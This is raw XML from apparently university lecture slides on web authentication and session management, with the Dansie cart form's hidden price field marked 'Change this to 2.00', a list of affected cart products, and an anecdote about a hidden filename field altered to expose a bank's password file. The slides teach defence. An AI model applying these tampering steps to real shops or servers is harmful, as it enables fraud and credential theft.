                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Dansie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Shopping Cart (2006)… “A premium, comprehensive, Perl shopping cart. Increase your web sales by making it easier for your web store customers to order.”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10245" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E903FAD9-7309-CC43-81A6-7D793547F0C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1854200" y="2986088"/>
            <a:ext cx="8280400" cy="341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spcBef>
                <a:spcPct val="100000"/>
              </a:spcBef>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;FORM METHOD=POST </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ACTION="http://www.dansie.net/cgi-bin/scripts/cart.pl"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  Black Leather purse with leather straps&lt;BR&gt;Price: $20.00&lt;BR&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;INPUT TYPE=HIDDEN NAME=name     VALUE="Black leather purse"&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;INPUT TYPE=HIDDEN NAME=price    VALUE="20.00"&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;INPUT TYPE=HIDDEN NAME=sh       VALUE="1"&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;INPUT TYPE=HIDDEN NAME=img      VALUE="purse.jpg"&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;INPUT TYPE=HIDDEN NAME=custom1  VALUE="Black leather purse 	with leather straps"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;INPUT TYPE=SUBMIT NAME="add" VALUE="Put in Shopping Cart"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/FORM&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1249289" name="Oval 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA7F751E-8A51-8541-83D6-0CDF12B66B60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6934200" y="4191000"/>
            <a:ext cx="8382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1249290" name="Text Box 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A542F18-EDE3-CD4C-B482-6C366E22E972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7070726" y="3657600"/>
            <a:ext cx="2690160" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Change this to 2.00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A picture containing pinwheel, outdoor object&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD3E32CD-5417-D743-8B40-F9814374E435}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7547018" y="4477831"/>
            <a:ext cx="1737575" cy="1737575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 4" descr="Dr. Evil | Super villain Wiki | Fandom">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E019CCF-9B7C-7546-AC95-DA2C026F5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7397" y="3858828"/>
            <a:ext cx="594060" cy="66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3580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9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92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289" grpId="0" animBg="1"/>
      <p:bldP spid="124929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44BED6F2-2126-9C45-B163-9D177CEEE6EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="92075" tIns="46038" rIns="92075" bIns="46038" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Shopping-Cart Form Tampering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11268" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2699B8DC-E244-A84B-91FB-7A15485EE579}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1199002" y="1839182"/>
            <a:ext cx="10263196" cy="4522981"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="92075" tIns="46038" rIns="92075" bIns="46038" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>Many Web-based shopping cart applications use hidden fields in HTML forms to hold parameters for items in an online store. These parameters can include the item's name, weight, quantity, product ID, and price. Any application that bases price on a hidden field in an HTML form is vulnerable to price changing by a remote user. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A remote user can change the price of a particular item they intend to buy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>, by changing the value for the hidden HTML tag that specifies the price, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to purchase products at any price they choose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Platforms affected:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>3D3.COM Pty Ltd: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ShopFactory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> 5.8 and earlier 		@Retail Corporation: @Retail Any version </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Adgrafix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>: Check It Out Any version 			Baron Consulting Group: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>WebSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> Tool Any version </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ComCity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> Corporation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>SalesCart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> Any version 		Crested Butte Software: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>EasyCart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> Any version </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Dansie.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Dansie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> Shopping Cart Any version 		Intelligent Vending Systems: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Intellivend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> Any version </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>Make-a-Store: Make-a-Store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>OrderPage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> Any version 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>McMurtrey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>/Whitaker &amp; Associates: Cart32 2.6 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>McMurtrey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>/Whitaker &amp; Associates: Cart32 3.0 		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>pknutsen@nethut.no</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>CartMan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> 1.04 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>Rich Media Technologies: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>JustAddCommerce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> 5.0 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>SmartCart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>SmartCart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> Any version </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>Web Express: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Shoptron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> 1.2 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB3D4840-E33D-344B-93AA-77173EA29A5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10179742" y="6123403"/>
            <a:ext cx="1548822" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>Source: X-Force</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="123384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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{141FA5F1-9C0A-F248-B05C-902581F0851F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Other Risks of Hidden Forms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12292" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACB13C5E-046B-7B43-972B-269E509E52E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Estonian bank’s Web server…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>HTML source reveals a hidden variable that points to a file name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Change file name to password file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Server displays contents of password file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Bank was not using shadow passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Standard cracking program took 15 minutes to crack root password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{168E6F44-9BE1-0140-B2A6-A21712D1D69D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9289392" y="6140837"/>
            <a:ext cx="2486578" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>From “The Art of Intrusion”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="Estonian 'Dumpling King' Goes Bankrupt Due to Anti-Russian Sanctions -  20.10.2017, Sputnik International">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE1CB9D7-3528-E54D-9995-C227F1818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5251" y="1290728"/>
            <a:ext cx="1722045" cy="12898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4F7755-D4EB-7B41-900E-B0A985B36622}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9858745" y="454501"/>
            <a:ext cx="1889230" cy="1335819"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4110269515"/>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2732</TotalTime>
  <Words>2355</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>349</Paragraphs>
  <Slides>35</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Calibri</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Garamond</vt:lpstr>
      <vt:lpstr>Monotype Sorts</vt:lpstr>
      <vt:lpstr>Segoe Print</vt:lpstr>
      <vt:lpstr>Selawik Light</vt:lpstr>
      <vt:lpstr>Speak Pro</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>SavonVTI</vt:lpstr>
      <vt:lpstr>Web AUTHENTICATION &amp; SESSION MANAGEMENT  Vitaly Shmatikov</vt:lpstr>
      <vt:lpstr>HTTP Digest Authentication</vt:lpstr>
      <vt:lpstr>Problems with HTTP Authentication</vt:lpstr>
      <vt:lpstr>Sessions</vt:lpstr>
      <vt:lpstr>Primitive Browser Session</vt:lpstr>
      <vt:lpstr>Bad Idea: Encoding State in URL</vt:lpstr>
      <vt:lpstr>Storing State in Hidden Forms</vt:lpstr>
      <vt:lpstr>Shopping-Cart Form Tampering</vt:lpstr>
      <vt:lpstr>Other Risks of Hidden Forms</vt:lpstr>
      <vt:lpstr>Remember: This is a Distributed System</vt:lpstr>
      <vt:lpstr>Session Management with Session Tokens</vt:lpstr>
      <vt:lpstr>Generating Session Tokens</vt:lpstr>
      <vt:lpstr>Examples of Weak Tokens</vt:lpstr>
      <vt:lpstr>Generating Strong Session Tokens</vt:lpstr>
      <vt:lpstr>Binding Token to Client’s Machine</vt:lpstr>
      <vt:lpstr>Storing Session Tokens</vt:lpstr>
      <vt:lpstr>HTTP Referer Header</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Storing State in Browser Cookies</vt:lpstr>
      <vt:lpstr>MAC: Message Authentication Code</vt:lpstr>
      <vt:lpstr>How MACs are Used in the Web</vt:lpstr>
      <vt:lpstr>HMAC</vt:lpstr>
      <vt:lpstr>How to Do It in ASP.NET</vt:lpstr>
      <vt:lpstr>Web Authentication with Cookies</vt:lpstr>
      <vt:lpstr>SOP Quiz #2</vt:lpstr>
      <vt:lpstr>HttpOnly Cookies</vt:lpstr>
      <vt:lpstr>Network Threats to Cookies</vt:lpstr>
      <vt:lpstr>Cookie Theft: SideJacking</vt:lpstr>
      <vt:lpstr>Cookie Theft: Surf Jacking</vt:lpstr>
      <vt:lpstr>Session Management with Session Tokens</vt:lpstr>
      <vt:lpstr>Session Fixation Attacks</vt:lpstr>
      <vt:lpstr>Preventing Session Fixation</vt:lpstr>
      <vt:lpstr>Logout Issues</vt:lpstr>
      <vt:lpstr>Web Applications</vt:lpstr>
      <vt:lpstr>Top Web Vulnerabilities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authentication</dc:title>
  <dc:subject/>
